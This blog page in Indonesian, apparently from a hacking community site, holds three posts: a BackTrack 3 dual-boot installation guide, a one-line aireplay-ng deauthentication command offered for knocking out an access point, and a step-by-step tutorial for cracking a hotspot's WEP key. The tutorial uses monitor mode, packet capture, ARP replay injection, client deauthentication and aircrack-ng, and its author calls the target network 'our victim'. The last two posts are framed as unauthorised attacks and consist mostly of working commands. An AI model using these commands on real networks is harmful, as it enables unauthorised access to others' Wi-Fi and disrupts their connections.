C

Kamis, 19 November 2009

Install BackTrack 3 dual boot with Windows XP

Pertama-tama gw punya 3 partisi windows, yaitu :
- sda1 primary 30 GB ntfs bootable
(ini adalah partisi system dengan tipe ntfs buat ngeboot windows XP)
- sda5 logical 5 GB fat32
(ini adalah partisi untuk GHOST, unmounted)
- sda6 logical 70 GB ntfs
(partisi windows untuk penyimpanan data)

Kedua-dua gw bikin lagi 2 partisi untuk keperluan nginstall BT3, yaitu :
- sda7 logical 1 GB linux-swap
(ini adalah partisi swap)
- sda8 logical 10 GB ext3
(ini adalah partisi yang gw gunain buat BT3, boot juga gw taroh dimari)

Pastikan semua partisi yang ada telah di unmount even itu partisi windows (swap abaikan saja):
bt ~ # umount /dev/sda1
bt ~ # umount /dev/sda6
bt ~ # umount /dev/sda8

Buat directory di directory mnt, klo gw bikinnya dengan nama sda8 :
bt ~ # mkdir /mnt/sda8

Mount sda8 di directory sda8 :
bt ~ # mount /dev/sda8 /mnt/sda8

Copy file-file utama dari Backtrack ke directory sda8 (yang ini prosesnya cukup lama, harap bersabar) :
bt ~ # cp –preserve -R /{bin,boot,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/sda8/

Bikin directory mnt,proc,sys,tmp di directory sda8 :
bt ~ # mkdir /mnt/sda8/{mnt,proc,sys,tmp}

Kemudian mount an already visible directory:
bt ~ # mount –bind /dev/ /mnt/sda8/dev/

Abiz itu mount :
bt ~ # mount -t proc proc /mnt/sda8/proc/

Kemudian copy file boot ke directory boot pada sda8 :
bt ~ # cp /boot/vmlinuz /mnt/sda8/boot/

Chroot directory sda8 :
bt ~ # chroot /mnt/sda8/ /bin/bash

Setelah chroot, prompt akan berubah menjadi seperti berikut :
bt / #

Setelah itu mari kita buat tampilan loading (splash screen) agar seperti splash screen pada live cd BT3 :
bt / # splash -s -f /etc/bootsplash/themes/Linux/config/bootsplash-1024x768.cfg >> /boot/splash.initrd

Edit lilo untuk ngejalanin dual boot :
bt / # nano /etc/lilo.conf

lba32
boot = /dev/sda
prompt
timeout = 1200
change-rules
reset
vga = 0x317
initrd = /boot/splash.initrd #untuk menampilkan splash screen
image = /boot/vmlinuz
root = /dev/sda8
label = BackTrack_3
read-only

other = /dev/sda1
label = Windows_XP
table = /dev/sda

#untuk menyimpan konfigurasi lilo.conf pada nano editor, teken keyboard ctrl+o
#kemudian simpen ke /etc/lilo.conf (klo udah otomatis muncul tulisannya, langsung teken keyboard enter ajah)
#trus klo mw udahan / keluar dari nano editor, teken keyboard ctrl+x

Lihat versi lilo sekaligus ngidupin lilo n nulis ke boot sector :
bt / # lilo -v
Jika berhasil pastikan tulisan ini muncul :
Boot image: /boot/vmlinuz
Added BackTrack_3 *

Boot other: /dev/sda1, on /dev/sda, loader CHAIN
Added Windows_XP

Kemudian keluar dari chroot :
bt / # exit

Setelah exit prompt akan kembali ke semula :
bt ~ #

Unmount directory berikut :
bt ~ # umount /mnt/sda8/dev/
bt ~ # umount /mnt/sda8/proc/

Reboot leptop / PC ke sda dan lihat hasil akhirnya….!
bt ~ # reboot

Nah itu adalah langkah-langkah instalasi BT3 Dual Boot dengan Windows XP yang gw jalanin dan sukses.

Melumpuhkan Acces Point Dengan Backtrack

hai cok.....
ini ada script bagus buat kamu coba aja.script ini berguna untuk melumpuhkan AP

aireplay-ng --deauth 3000 -a [Mac AP Target] -c ff:ff:ff:ff:ff:ff eth1

gunakan saja pasti asyik.tapi gunakanlah pada waktu admin sedang pelit.

Menjebol Proteksi WEP

ini adalah bagian kedua dari praktek Menjebol HotSpot. Jikalau pada artikel sebelumnya kita membahas bagaimana menembus batas proteksi MAC address, pada kali ini kita akan membahas bagaimana mendapatkan akses HotSpot yang menggunakan WEP (Wired Equivalent Privacy) Keys.

Alat yang kita butuhkan adalah :

1. Sebuah Laptop

2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.

3.Linux Live CD distro : Backtrack 2.0

Mengapa kita membutuhkan Laptop ? Tentu saja karena akses HotSpot biasanya diberikan untuk pengguna yang Mobile. Dan dengan laptop kita memiliki fleksibilitas yang tinggi pula.

Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.

Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :

1. 3Com 3CRPAG175B

2.3Com 3CRXJK10075

3.DLINK DWL-G630 Rev C

4.Linksys WPC55AG

5.TrendNET TEW-441PC

6.TrendNET TEW-443PI

7.TP-LINK TL-WN610G


Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini :) yaitu lakukan booting dengan CD Backtrack anda .


Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :

airmon-ng stop ath0

airmon-ng start wifi0

Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :

airodump-ng ath0


Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :

airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0

Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.

Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :

aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:19:D2:45:D0:EB ath0

Client yang diserang ini memiliki Mac address 00:19:D2:45:D0:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:19:D2:45:D0:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi :P

Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :

aireplay-ng –deauth 5 -c 00:19:D2:45:D0:EB -a 00:19:5B:5C:62:92 ath0

Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :


Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :

aircrack-ng hasil*.cap

atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :

aircrack-ptw hasil-01.cap

Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut :) Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .



JANCOK COMMUNITY © 2008. Design by :Yanku Templates Sponsored by: Tutorial87 Commentcute